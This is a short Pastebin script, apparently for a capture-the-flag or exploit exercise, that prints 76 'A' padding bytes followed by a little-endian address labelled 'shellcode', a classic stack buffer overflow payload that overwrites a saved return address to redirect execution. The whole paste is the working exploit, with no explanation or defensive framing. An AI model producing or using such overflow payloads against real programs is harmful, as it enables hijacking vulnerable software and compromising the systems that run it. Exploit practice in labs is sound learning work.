Data hosted with ♥ by Pastebin.com - Download Raw - See Original
  1. #!/usr/python
  2.  
  3. buf="\x41"*76
  4. shellcode="\xf4\x83\x04\x08"
  5.  
  6. print(buf+shellcode)
  7.